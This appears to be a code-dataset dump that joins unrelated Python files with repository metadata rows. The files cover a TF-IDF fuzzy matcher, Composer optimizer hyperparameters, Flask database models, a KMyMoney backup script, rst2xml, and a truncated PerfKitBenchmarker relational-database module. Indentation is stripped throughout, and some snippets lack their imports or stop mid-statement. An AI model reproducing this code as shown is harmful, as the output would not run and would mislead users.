from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.neighbors import NearestNeighbors
def matcher(original = [], lookup = [], k_matches = 5, ngram_length = 3):
assert all([type(x) == type("string") for x in original]), "Original contains non-str elements!"
assert all([type(x) == type("string") for x in lookup]), "Lookup contains non-str elements!"
assert type(k_matches) == type(0), "k_matches must be an integer"
assert k_matches <= len(lookup), "k_matches must be shorter or equal to the total length of the lookup list"
assert type(ngram_length) == type(0), "ngram_length must be an integer"
original = list(original)
lookup = list(lookup)
original_lower = [x.lower() for x in original]
lookup_lower = [x.lower() for x in lookup]
def ngrams_user(string, n = ngram_length):
return ngrams(string, n)
vectorizer = TfidfVectorizer(min_df = 1,
analyzer = ngrams_user)
tf_idf_lookup = vectorizer.fit_transform(lookup_lower)
nbrs = NearestNeighbors(n_neighbors=k_matches,
n_jobs=-1, metric='cosine').fit(tf_idf_lookup)
tf_idf_original = vectorizer.transform(original_lower)
distances, indices = nbrs.kneighbors(tf_idf_original)
meta_list= []
lookup_list= []
for i,idx in enumerate(indices):
metadata = [round(distances[i][0], 2), original[i]]
lookups = [lookup[x] for x in idx]
meta_list.append(metadata)
lookup_list.append(lookups)
df_metadata = pd.DataFrame(meta_list, columns = ['Match Confidence', 'Original Name'])
df_lookups = pd.DataFrame(lookup_list,
columns=['Lookup ' + str(x+1) for x in range(0,k_matches)])
matches = pd.concat([df_metadata, df_lookups], axis = 1)
matches['Match Confidence'] = abs(matches['Match Confidence'] - 1)
return matches
| true | true |
f7fa1a5a5cbfdf1feb4c6cddf9f02f27f4229961 | 6,106 | py | Python | composer/optim/optimizer_hparams.py | anisehsani/composer | 42599682d50409b4a4eb7c91fad85d67418cee13 | [
"Apache-2.0"
] | null | null | null | composer/optim/optimizer_hparams.py | anisehsani/composer | 42599682d50409b4a4eb7c91fad85d67418cee13 | [
"Apache-2.0"
] | null | null | null | composer/optim/optimizer_hparams.py | anisehsani/composer | 42599682d50409b4a4eb7c91fad85d67418cee13 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 MosaicML. All Rights Reserved.
from abc import ABC, abstractmethod
from dataclasses import asdict, dataclass
from typing import List, Type
import torch
import torch_optimizer
import yahp as hp
from composer.core.types import ModelParameters, Optimizer
from composer.optim import DecoupledAdamW, DecoupledSGDW
# Optimizer parameters and defaults match those in torch.optim
@dataclass
class OptimizerHparams(hp.Hparams, ABC):
"""Abstract base class for optimizer hyperparameter classes."""
@property
@abstractmethod
def optimizer_object(cls) -> Type[Optimizer]:
pass
def initialize_object(self, param_group: ModelParameters) -> Optimizer:
assert issubclass(self.optimizer_object, torch.optim.Optimizer)
return self.optimizer_object(param_group, **asdict(self))
@dataclass
class AdamHparams(OptimizerHparams):
"""Hyperparameters for the :class:`~torch.optim.Adam` optimizer."""
lr: float = hp.optional(default=0.001, doc='learning rate')
betas: List[float] = hp.optional(default_factory=lambda: [0.9, 0.999],
doc='coefficients used for computing running averages of gradient and its square.')
eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
amsgrad: bool = hp.optional(default=False, doc='use AMSGrad variant')
@property
def optimizer_object(cls) -> Type[torch.optim.Adam]:
return torch.optim.Adam
@dataclass
class RAdamHparams(OptimizerHparams):
"""Hyperparameters for the :class:`~torch.optim.RAdam` optimizer."""
lr: float = hp.optional(default=0.001, doc='learning rate')
betas: List[float] = hp.optional(default_factory=lambda: [0.9, 0.999],
doc='coefficients used for computing running averages of gradient and its square.')
eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
@property
def optimizer_object(cls) -> Type[torch_optimizer.RAdam]:
return torch_optimizer.RAdam
@dataclass
class AdamWHparams(OptimizerHparams):
"""Hyperparameters for the :class:`torch.optim.AdamW` optimizer."""
lr: float = hp.optional(default=0.001, doc='learning rate')
betas: List[float] = hp.optional(default_factory=lambda: [0.9, 0.999],
doc='coefficients used for computing running averages of gradient and its square.')
eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
weight_decay: float = hp.optional(default=1e-2, doc='weight decay (L2 penalty)')
amsgrad: bool = hp.optional(default=False, doc='use AMSGrad variant')
@property
def optimizer_object(cls) -> Type[torch.optim.AdamW]:
return torch.optim.AdamW
@dataclass
class DecoupledAdamWHparams(OptimizerHparams):
"""Hyperparameters for the :class:`~composer.optim.DecoupledAdamW` optimizer."""
lr: float = hp.optional(default=0.001, doc='learning rate')
betas: List[float] = hp.optional(default_factory=lambda: [0.9, 0.999],
doc='coefficients used for computing running averages of gradient and its square.')
eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
weight_decay: float = hp.optional(default=1e-2, doc='weight decay (L2 penalty)')
amsgrad: bool = hp.optional(default=False, doc='use AMSGrad variant')
@property
def optimizer_object(cls) -> Type[DecoupledAdamW]:
return DecoupledAdamW
@dataclass
class SGDHparams(OptimizerHparams):
"""Hyperparameters for the `SGD <https://pytorch.org/docs/stable/generated/torch.optim.SGD.html#torch.optim.SGD>`_
optimizer."""
lr: float = hp.required(doc='learning rate')
momentum: float = hp.optional(default=0.0, doc='momentum factor')
weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
dampening: float = hp.optional(default=0.0, doc='dampening for momentum')
nesterov: bool = hp.optional(default=False, doc='Nesterov momentum')
@property
def optimizer_object(cls) -> Type[torch.optim.SGD]:
return torch.optim.SGD
@dataclass
class DecoupledSGDWHparams(OptimizerHparams):
"""Hyperparameters for the :class:`~composer.optim.DecoupledSGDW` optimizer."""
lr: float = hp.required(doc='learning rate')
momentum: float = hp.optional(default=0.0, doc='momentum factor')
weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
dampening: float = hp.optional(default=0.0, doc='dampening for momentum')
nesterov: bool = hp.optional(default=False, doc='Nesterov momentum')
@property
def optimizer_object(cls) -> Type[DecoupledSGDW]:
return DecoupledSGDW
@dataclass
class RMSPropHparams(OptimizerHparams):
"""Hyperparameters for the [RMSProp
optimizer](https://pytorch.org/docs/stable/generated/torch.optim.RMSprop.html#torch.optim.RMSprop)."""
lr: float = hp.required(doc='learning rate')
alpha: float = hp.optional(default=0.99, doc='smoothing constant')
eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
momentum: float = hp.optional(default=0.0, doc='momentum factor')
weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
centered: bool = hp.optional(
default=False,
doc='normalize gradient by an estimation of variance',
)
@property
def optimizer_object(cls) -> Type[torch.optim.RMSprop]:
return torch.optim.RMSprop
def get_optimizer(param_groups: ModelParameters, hparams: OptimizerHparams) -> Optimizer:
"""Get the optimizer specified by the given hyperparameters.
Args:
param_groups (ModelParameters): List of model parameters to optimize.
hparams (OptimizerHparams): Instance of an optimizer's hyperparameters.
"""
return hparams.initialize_object(param_group=param_groups)
| 41.537415 | 120 | 0.706191 |
from abc import ABC, abstractmethod
from dataclasses import asdict, dataclass
from typing import List, Type
import torch
import torch_optimizer
import yahp as hp
from composer.core.types import ModelParameters, Optimizer
from composer.optim import DecoupledAdamW, DecoupledSGDW
@dataclass
class OptimizerHparams(hp.Hparams, ABC):
@property
@abstractmethod
def optimizer_object(cls) -> Type[Optimizer]:
pass
def initialize_object(self, param_group: ModelParameters) -> Optimizer:
assert issubclass(self.optimizer_object, torch.optim.Optimizer)
return self.optimizer_object(param_group, **asdict(self))
@dataclass
class AdamHparams(OptimizerHparams):
lr: float = hp.optional(default=0.001, doc='learning rate')
betas: List[float] = hp.optional(default_factory=lambda: [0.9, 0.999],
doc='coefficients used for computing running averages of gradient and its square.')
eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
amsgrad: bool = hp.optional(default=False, doc='use AMSGrad variant')
@property
def optimizer_object(cls) -> Type[torch.optim.Adam]:
return torch.optim.Adam
@dataclass
class RAdamHparams(OptimizerHparams):
lr: float = hp.optional(default=0.001, doc='learning rate')
betas: List[float] = hp.optional(default_factory=lambda: [0.9, 0.999],
doc='coefficients used for computing running averages of gradient and its square.')
eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
@property
def optimizer_object(cls) -> Type[torch_optimizer.RAdam]:
return torch_optimizer.RAdam
@dataclass
class AdamWHparams(OptimizerHparams):
lr: float = hp.optional(default=0.001, doc='learning rate')
betas: List[float] = hp.optional(default_factory=lambda: [0.9, 0.999],
doc='coefficients used for computing running averages of gradient and its square.')
eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
weight_decay: float = hp.optional(default=1e-2, doc='weight decay (L2 penalty)')
amsgrad: bool = hp.optional(default=False, doc='use AMSGrad variant')
@property
def optimizer_object(cls) -> Type[torch.optim.AdamW]:
return torch.optim.AdamW
@dataclass
class DecoupledAdamWHparams(OptimizerHparams):
lr: float = hp.optional(default=0.001, doc='learning rate')
betas: List[float] = hp.optional(default_factory=lambda: [0.9, 0.999],
doc='coefficients used for computing running averages of gradient and its square.')
eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
weight_decay: float = hp.optional(default=1e-2, doc='weight decay (L2 penalty)')
amsgrad: bool = hp.optional(default=False, doc='use AMSGrad variant')
@property
def optimizer_object(cls) -> Type[DecoupledAdamW]:
return DecoupledAdamW
@dataclass
class SGDHparams(OptimizerHparams):
lr: float = hp.required(doc='learning rate')
momentum: float = hp.optional(default=0.0, doc='momentum factor')
weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
dampening: float = hp.optional(default=0.0, doc='dampening for momentum')
nesterov: bool = hp.optional(default=False, doc='Nesterov momentum')
@property
def optimizer_object(cls) -> Type[torch.optim.SGD]:
return torch.optim.SGD
@dataclass
class DecoupledSGDWHparams(OptimizerHparams):
lr: float = hp.required(doc='learning rate')
momentum: float = hp.optional(default=0.0, doc='momentum factor')
weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
dampening: float = hp.optional(default=0.0, doc='dampening for momentum')
nesterov: bool = hp.optional(default=False, doc='Nesterov momentum')
@property
def optimizer_object(cls) -> Type[DecoupledSGDW]:
return DecoupledSGDW
@dataclass
class RMSPropHparams(OptimizerHparams):
lr: float = hp.required(doc='learning rate')
alpha: float = hp.optional(default=0.99, doc='smoothing constant')
eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
momentum: float = hp.optional(default=0.0, doc='momentum factor')
weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
centered: bool = hp.optional(
default=False,
doc='normalize gradient by an estimation of variance',
)
@property
def optimizer_object(cls) -> Type[torch.optim.RMSprop]:
return torch.optim.RMSprop
def get_optimizer(param_groups: ModelParameters, hparams: OptimizerHparams) -> Optimizer:
return hparams.initialize_object(param_group=param_groups)
| true | true |
f7fa1a71209ef1ff9c0eb284d995d1d0f198b0e0 | 824 | py | Python | models.py | chantellecv/E-commerce-Site | c5280e9d6c90d196242f77a6cdacc5850a0cf2a2 | [
"MIT"
] | null | null | null | models.py | chantellecv/E-commerce-Site | c5280e9d6c90d196242f77a6cdacc5850a0cf2a2 | [
"MIT"
] | null | null | null | models.py | chantellecv/E-commerce-Site | c5280e9d6c90d196242f77a6cdacc5850a0cf2a2 | [
"MIT"
] | null | null | null | from db import db
class User(db.Model):
usr_id = db.Column(db.Integer, primary_key=True)
fullname = db.Column(db.String(100), nullable=False)
username = db.Column(db.String(50), unique=True, nullable=False)
password = db.Column(db.String(250), nullable=False)
def __repr__(self):
return '<Name %r>' % self.fullname
class Product(db.Model):
pro_id = db.Column(db.Integer, primary_key=True)
category= db.Column(db.String(50), nullable=False)
name = db.Column(db.String(100), nullable=False)
description= db.Column(db.String(250), nullable=True)
price= db.Column(db.String(200), nullable=False)
comments= db.Column(db.String(200), nullable=True)
filename = db.Column(db.Text, nullable=False, unique=True)
username = db.Column(db.String(50), nullable=False)
def __repr__(self):
return '<Name %r>' % self.name | 39.238095 | 65 | 0.731796 | from db import db
class User(db.Model):
usr_id = db.Column(db.Integer, primary_key=True)
fullname = db.Column(db.String(100), nullable=False)
username = db.Column(db.String(50), unique=True, nullable=False)
password = db.Column(db.String(250), nullable=False)
def __repr__(self):
return '<Name %r>' % self.fullname
class Product(db.Model):
pro_id = db.Column(db.Integer, primary_key=True)
category= db.Column(db.String(50), nullable=False)
name = db.Column(db.String(100), nullable=False)
description= db.Column(db.String(250), nullable=True)
price= db.Column(db.String(200), nullable=False)
comments= db.Column(db.String(200), nullable=True)
filename = db.Column(db.Text, nullable=False, unique=True)
username = db.Column(db.String(50), nullable=False)
def __repr__(self):
return '<Name %r>' % self.name | true | true |
f7fa1adf716d6e64ab46ed050b6366a56b3b72d8 | 3,561 | py | Python | backupKMyMoney.py | gregorybrancq/pythonScripts | 4b8519b26859bc318089c615b3255a68b68e3252 | [
"MIT"
] | null | null | null | backupKMyMoney.py | gregorybrancq/pythonScripts | 4b8519b26859bc318089c615b3255a68b68e3252 | [
"MIT"
] | null | null | null | backupKMyMoney.py | gregorybrancq/pythonScripts | 4b8519b26859bc318089c615b3255a68b68e3252 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*-coding:Latin-1 -*
'''
Backup KMyMoney files
'''
## Import
import sys
import os, os.path
import re
from datetime import datetime
import filecmp
import shutil
from optparse import OptionParser
## common
from python_common import *
HEADER = "backupKMyMoney"
## directory
homeDir = getHomeDir()
logDir = getLogDir()
###############################################
###############################################
###############################################
## Line Parsing ##
###############################################
###############################################
parsedArgs = {}
parser = OptionParser()
parser.add_option(
"-d",
"--debug",
action = "store_true",
dest = "debug",
default = False,
help = "Display all debug information"
)
(parsedArgs , args) = parser.parse_args()
###############################################
###############################################
## Global variables
###############################################
t = str(datetime.today().isoformat("_"))
logFile = os.path.join(logDir, HEADER + "_" + t + ".log")
lockFile = os.path.join(logDir, HEADER + ".lock")
fileBackupList = []
fileBackupName = ""
fileName = "comptes.kmy"
fileBackupDir = "/home/greg/Backup/KMyMoney"
fileOriginal = os.path.join(homeDir, "Config/tools/kmymoney", fileName)
###############################################
###############################################
###############################################
## FUNCTIONS ##
###############################################
###############################################
def findBackupFiles() :
global log
global fileBackupList
log.info(HEADER, "In findBackupFiles")
fileBackupList = [ f for f in os.listdir(fileBackupDir) if (os.path.isfile(os.path.join(fileBackupDir,f))) ]
log.info(HEADER, "Out findBackupFiles fileList=" + str(fileBackupList))
def backupToDo() :
global log
global fileBackupName
log.info(HEADER, "In backupToDo")
# find the last backup file name
findBackupFiles()
## Look if it's necessary to backup
didBackup = False
for f in fileBackupList :
log.info(HEADER, "In backupToDo fileBackup=" + str(f))
comp = filecmp.cmp(fileOriginal, os.path.join(fileBackupDir, f))
if comp :
log.info(HEADER, "In backupToDo fileBackup find")
didBackup = True
break
if not didBackup :
now = datetime.now()
(fileN, extN) = os.path.splitext(fileName)
newName = fileN + "_" + str(now.strftime("%Y-%m-%d") + extN)
log.info(HEADER, "In backupToDo copy newName=" + str(newName))
shutil.copy2(fileOriginal, os.path.join(fileBackupDir, newName))
log.info(HEADER, "Out backupToDo")
###############################################
###############################################
###############################################
###############################################
## MAIN ##
###############################################
###############################################
###############################################
def main() :
global log
log.info(HEADER, "In main")
## Backup file
backupToDo()
log.info(HEADER, "Out main")
if __name__ == '__main__':
## Create log class
log = LOGC(logFile, HEADER, parsedArgs.debug)
main()
###############################################
| 23.123377 | 112 | 0.440607 |
sys
import os, os.path
import re
from datetime import datetime
import filecmp
import shutil
from optparse import OptionParser
thon_common import *
HEADER = "backupKMyMoney"
getHomeDir()
logDir = getLogDir()
| true | true |
f7fa1b1ea0ccf21f2d9a41c53eae62153a4e19a2 | 641 | py | Python | venv/bin/rst2xml.py | robertoweller/jogo_historia | 011238e0488f282ef3bf3f3b6be8bd9ca3c32fd2 | [
"CC0-1.0"
] | 6 | 2020-04-10T14:36:25.000Z | 2021-04-25T13:11:32.000Z | venv/bin/rst2xml.py | robertoweller/jogo_historia | 011238e0488f282ef3bf3f3b6be8bd9ca3c32fd2 | [
"CC0-1.0"
] | null | null | null | venv/bin/rst2xml.py | robertoweller/jogo_historia | 011238e0488f282ef3bf3f3b6be8bd9ca3c32fd2 | [
"CC0-1.0"
] | null | null | null | #!/home/roberto/Documentos/jogo_historia/venv/bin/python3
# $Id: rst2xml.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing Docutils XML.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates Docutils-native XML from standalone '
'reStructuredText sources. ' + default_description)
publish_cmdline(writer_name='xml', description=description)
| 26.708333 | 70 | 0.74571 |
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates Docutils-native XML from standalone '
'reStructuredText sources. ' + default_description)
publish_cmdline(writer_name='xml', description=description)
| true | true |
f7fa1f485ebb470340b5e30e36d66eb5496b358f | 29,714 | py | Python | perfkitbenchmarker/relational_db.py | cyberheb/PerfKitBenchmarker | 3a250b2e61f09ac0e1d04b5fa239805cc1e771fe | [
"Apache-2.0"
] | null | null | null | perfkitbenchmarker/relational_db.py | cyberheb/PerfKitBenchmarker | 3a250b2e61f09ac0e1d04b5fa239805cc1e771fe | [
"Apache-2.0"
] | null | null | null | perfkitbenchmarker/relational_db.py | cyberheb/PerfKitBenchmarker | 3a250b2e61f09ac0e1d04b5fa239805cc1e771fe | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import abstractmethod
import posixpath
import random
import re
import string
import uuid
from absl import flags
from perfkitbenchmarker import data
from perfkitbenchmarker import resource
from perfkitbenchmarker import vm_util
import six
# TODO(ferneyhough): change to enum
flags.DEFINE_string('managed_db_engine', None,
'Managed database flavor to use (mysql, postgres)')
flags.DEFINE_string('managed_db_engine_version', None,
'Version of the database flavor selected, e.g. 5.7')
flags.DEFINE_string('managed_db_database_name', None,
'Name of the database to create. Defaults to '
'pkb-db-[run-uri]')
flags.DEFINE_string('managed_db_database_username', None,
'Database username. Defaults to '
'pkb-db-user-[run-uri]')
flags.DEFINE_string('managed_db_database_password', None,
'Database password. Defaults to '
'a random 10-character alpha-numeric string')
flags.DEFINE_boolean('managed_db_high_availability', False,
'Specifies if the database should be high availability')
flags.DEFINE_boolean('managed_db_backup_enabled', True,
'Whether or not to enable automated backups')
flags.DEFINE_string('managed_db_backup_start_time', '07:00',
'Time in UTC that automated backups (if enabled) '
'will be scheduled. In the form HH:MM UTC. '
'Defaults to 07:00 UTC')
flags.DEFINE_list('managed_db_zone', None,
'zone or region to launch the database in. '
'Defaults to the client vm\'s zone.')
flags.DEFINE_string('client_vm_zone', None,
'zone or region to launch the client in. ')
flags.DEFINE_string('managed_db_machine_type', None,
'Machine type of the database.')
flags.DEFINE_integer('managed_db_cpus', None,
'Number of Cpus in the database.')
flags.DEFINE_string('managed_db_memory', None,
'Amount of Memory in the database. Uses the same format '
'string as custom machine memory type.')
flags.DEFINE_integer('managed_db_disk_size', None,
'Size of the database disk in GB.')
flags.DEFINE_string('managed_db_disk_type', None, 'Disk type of the database.')
flags.DEFINE_integer('managed_db_disk_iops', None,
'Disk iops of the database on AWS io1 disks.')
flags.DEFINE_integer('managed_db_azure_compute_units', None,
'Number of Dtus in the database.')
flags.DEFINE_string('managed_db_tier', None,
'Tier in azure. (Basic, Standard, Premium).')
flags.DEFINE_string('client_vm_machine_type', None,
'Machine type of the client vm.')
flags.DEFINE_integer('client_vm_cpus', None, 'Number of Cpus in the client vm.')
flags.DEFINE_string(
'client_vm_memory', None,
'Amount of Memory in the vm. Uses the same format '
'string as custom machine memory type.')
flags.DEFINE_integer('client_vm_disk_size', None,
'Size of the client vm disk in GB.')
flags.DEFINE_string('client_vm_disk_type', None, 'Disk type of the client vm.')
flags.DEFINE_integer('client_vm_disk_iops', None,
'Disk iops of the database on AWS for client vm.')
flags.DEFINE_boolean(
'use_managed_db', True, 'If true, uses the managed MySql '
'service for the requested cloud provider. If false, uses '
'MySql installed on a VM.')
flags.DEFINE_list(
'db_flags', '', 'Flags to apply to the implementation of '
'MySQL on the cloud that\'s being used. Example: '
'binlog_cache_size=4096,innodb_log_buffer_size=4294967295')
flags.DEFINE_integer(
'innodb_buffer_pool_size', None,
'Size of the innodb buffer pool size in GB. '
'Defaults to 25% of VM memory if unset')
flags.DEFINE_bool(
'mysql_bin_log', False,
'Flag to turn binary logging on. '
'Defaults to False')
flags.DEFINE_integer('innodb_log_file_size', 1000,
'Size of the log file in MB. Defaults to 1000M.')
flags.DEFINE_integer(
'postgres_shared_buffer_size', None,
'Size of the shared buffer size in GB. '
'Defaults to 25% of VM memory if unset')
BACKUP_TIME_REGULAR_EXPRESSION = '^\d\d\:\d\d$'
flags.register_validator(
'managed_db_backup_start_time',
lambda value: re.search(BACKUP_TIME_REGULAR_EXPRESSION, value) is not None,
message=('--database_backup_start_time must be in the form HH:MM'))
MYSQL = 'mysql'
POSTGRES = 'postgres'
AURORA_POSTGRES = 'aurora-postgresql'
AURORA_MYSQL = 'aurora-mysql'
AURORA_MYSQL56 = 'aurora'
SQLSERVER = 'sqlserver'
SQLSERVER_EXPRESS = 'sqlserver-ex'
SQLSERVER_ENTERPRISE = 'sqlserver-ee'
SQLSERVER_STANDARD = 'sqlserver-se'
ALL_ENGINES = [
MYSQL,
POSTGRES,
AURORA_POSTGRES,
AURORA_MYSQL,
AURORA_MYSQL56,
SQLSERVER,
SQLSERVER_EXPRESS,
SQLSERVER_ENTERPRISE,
SQLSERVER_STANDARD
]
FLAGS = flags.FLAGS
POSTGRES_13_VERSION = '13'
POSTGRES_RESOURCE_PATH = 'database_configurations/postgres'
POSTGRES_HBA_CONFIG = 'pg_hba.conf'
POSTGRES_CONFIG = 'postgresql.conf'
POSTGRES_CONFIG_PATH = '/etc/postgresql/{0}/main/'
# TODO: Implement DEFAULT BACKUP_START_TIME for instances.
class RelationalDbPropertyNotSet(Exception):
pass
class RelationalDbEngineNotFoundException(Exception):
pass
class UnsupportedError(Exception):
pass
def GenerateRandomDbPassword():
"""Generate a strong random password.
# pylint: disable=line-too-long
Reference: https://docs.microsoft.com/en-us/sql/relational-databases/security/password-policy?view=sql-server-ver15
# pylint: enable=line-too-long
Returns:
A random database password.
"""
prefix = [random.choice(string.ascii_lowercase),
random.choice(string.ascii_uppercase),
random.choice(string.digits)]
return ''.join(prefix) + str(uuid.uuid4())[:10]
def GetRelationalDbClass(cloud):
"""Get the RelationalDb class corresponding to 'cloud'.
Args:
cloud: name of cloud to get the class for
Returns:
BaseRelationalDb class with the cloud attribute of 'cloud'.
"""
return resource.GetResourceClass(BaseRelationalDb, CLOUD=cloud)
def VmsToBoot(vm_groups):
# TODO(jerlawson): Enable replications.
return {
name: spec # pylint: disable=g-complex-comprehension
for name, spec in six.iteritems(vm_groups)
if name == 'clients' or name == 'default' or
(not FLAGS.use_managed_db and name == 'servers')
}
class BaseRelationalDb(resource.BaseResource):
"""Object representing a relational database Service."""
RESOURCE_TYPE = 'BaseRelationalDb'
def __init__(self, relational_db_spec):
"""Initialize the managed relational database object.
Args:
relational_db_spec: spec of the managed database.
Raises:
UnsupportedError: if high availability is requested for an unmanaged db.
"""
super(BaseRelationalDb, self).__init__()
self.spec = relational_db_spec
if not FLAGS.use_managed_db:
if self.spec.high_availability:
raise UnsupportedError('High availability is unsupported for unmanaged '
'databases.')
self.endpoint = ''
self.spec.database_username = 'root'
self.spec.database_password = 'perfkitbenchmarker'
self.innodb_buffer_pool_size = FLAGS.innodb_buffer_pool_size
self.mysql_bin_log = FLAGS.mysql_bin_log
self.innodb_log_file_size = FLAGS.innodb_log_file_size
self.postgres_shared_buffer_size = FLAGS.postgres_shared_buffer_size
self.is_managed_db = False
else:
self.is_managed_db = True
@property
def client_vm(self):
"""Client VM which will drive the database test.
This is required by subclasses to perform client-vm
network-specific tasks, such as getting information about
the VPC, IP address, etc.
Raises:
RelationalDbPropertyNotSet: if the client_vm is missing.
Returns:
The client_vm.
"""
if not hasattr(self, '_client_vm'):
raise RelationalDbPropertyNotSet('client_vm is not set')
return self._client_vm
@client_vm.setter
def client_vm(self, client_vm):
self._client_vm = client_vm
@property
def server_vm(self):
"""Server VM for hosting a managed database.
Raises:
RelationalDbPropertyNotSet: if the server_vm is missing.
Returns:
The server_vm.
"""
if not hasattr(self, '_server_vm'):
raise RelationalDbPropertyNotSet('server_vm is not set')
return self._server_vm
@server_vm.setter
def server_vm(self, server_vm):
self._server_vm = server_vm
def SetVms(self, vm_groups):
self.client_vm = vm_groups['clients' if 'clients' in
vm_groups else 'default'][0]
if not self.is_managed_db and 'servers' in vm_groups:
self.server_vm = vm_groups['servers'][0]
kb_to_gb = 1.0 / 1000000
if not self.innodb_buffer_pool_size:
self.innodb_buffer_pool_size = int(self.server_vm.total_memory_kb *
kb_to_gb / 4)
if not self.postgres_shared_buffer_size:
self.postgres_shared_buffer_size = int(self.server_vm.total_memory_kb *
kb_to_gb / 4)
# TODO(jerlawson): Enable replications.
def MakePsqlConnectionString(self, database_name, use_localhost=False):
return '\'host={0} user={1} password={2} dbname={3}\''.format(
self.endpoint if not use_localhost else 'localhost',
self.spec.database_username, self.spec.database_password, database_name)
def MakeMysqlConnectionString(self, use_localhost=False):
return '-h {0}{1} -u {2} -p{3}'.format(
self.endpoint if not use_localhost else 'localhost',
' -P 3306' if not self.is_managed_db else '',
self.spec.database_username, self.spec.database_password)
def MakeSysbenchConnectionString(self):
return (
'--mysql-host={0}{1} --mysql-user={2} --mysql-password="{3}" ').format(
self.endpoint,
' --mysql-port=3306' if not self.is_managed_db else '',
self.spec.database_username, self.spec.database_password)
def MakeMysqlCommand(self, command, use_localhost=False):
"""Return Mysql Command with correct credentials."""
return 'mysql %s -e "%s"' % (self.MakeMysqlConnectionString(
use_localhost=use_localhost), command)
def MakeSqlserverCommand(self, command, use_localhost=False):
"""Return Sql server command with correct credentials."""
return '/opt/mssql-tools/bin/sqlcmd -S %s -U %s -P %s -Q "%s"' % (
self.endpoint if not use_localhost else 'localhost',
self.spec.database_username, self.spec.database_password, command)
def MakePostgresCommand(self, db_name, command, use_localhost=False):
"""Return Postgres command vm with correct credentials."""
return 'psql %s -c "%s"' % (self.MakePsqlConnectionString(
db_name, use_localhost), command)
@property
def endpoint(self):
"""Endpoint of the database server (exclusing port)."""
if not hasattr(self, '_endpoint'):
raise RelationalDbPropertyNotSet('endpoint not set')
return self._endpoint
@endpoint.setter
def endpoint(self, endpoint):
self._endpoint = endpoint
@property
def port(self):
"""Port (int) on which the database server is listening."""
if not hasattr(self, '_port'):
raise RelationalDbPropertyNotSet('port not set')
return self._port
@port.setter
def port(self, port):
self._port = int(port)
def GetResourceMetadata(self):
"""Returns a dictionary of metadata.
Child classes can extend this if needed.
Raises:
RelationalDbPropertyNotSet: if any expected metadata is missing.
"""
metadata = {
'zone': self.spec.db_spec.zone,
'disk_type': self.spec.db_disk_spec.disk_type,
'disk_size': self.spec.db_disk_spec.disk_size,
'engine': self.spec.engine,
'high_availability': self.spec.high_availability,
'backup_enabled': self.spec.backup_enabled,
'backup_start_time': self.spec.backup_start_time,
'engine_version': self.spec.engine_version,
'client_vm_zone': self.spec.vm_groups['clients'].vm_spec.zone,
'use_managed_db': self.is_managed_db,
'instance_id': self.instance_id,
'client_vm_disk_type':
self.spec.vm_groups['clients'].disk_spec.disk_type,
'client_vm_disk_size':
self.spec.vm_groups['clients'].disk_spec.disk_size,
}
if not self.is_managed_db and self.spec.engine == 'mysql':
metadata.update({
'unmanaged_db_innodb_buffer_pool_size_gb':
self.innodb_buffer_pool_size,
'unmanaged_db_innodb_log_file_size_mb':
self.innodb_log_file_size,
'unmanaged_db_mysql_bin_log':
self.mysql_bin_log
})
if not self.is_managed_db and self.spec.engine == 'postgres':
metadata.update({
'postgres_shared_buffer_size':
self.postgres_shared_buffer_size
})
if (hasattr(self.spec.db_spec, 'machine_type') and
self.spec.db_spec.machine_type):
metadata.update({
'machine_type': self.spec.db_spec.machine_type,
})
elif hasattr(self.spec.db_spec, 'cpus') and (hasattr(
self.spec.db_spec, 'memory')):
metadata.update({
'cpus': self.spec.db_spec.cpus,
})
metadata.update({
'memory': self.spec.db_spec.memory,
})
elif hasattr(self.spec.db_spec, 'tier') and (hasattr(
self.spec.db_spec, 'compute_units')):
metadata.update({
'tier': self.spec.db_spec.tier,
})
metadata.update({
'compute_units': self.spec.db_spec.compute_units,
})
else:
raise RelationalDbPropertyNotSet(
'Machine type of the database must be set.')
if (hasattr(self.spec.vm_groups['clients'].vm_spec, 'machine_type') and
self.spec.vm_groups['clients'].vm_spec.machine_type):
metadata.update({
'client_vm_machine_type':
self.spec.vm_groups['clients'].vm_spec.machine_type,
})
elif hasattr(self.spec.vm_groups['clients'].vm_spec, 'cpus') and (hasattr(
self.spec.vm_groups['clients'].vm_spec, 'memory')):
metadata.update({
'client_vm_cpus': self.spec.vm_groups['clients'].vm_spec.cpus,
})
metadata.update({
'client_vm_memory': self.spec.vm_groups['clients'].vm_spec.memory,
})
else:
raise RelationalDbPropertyNotSet(
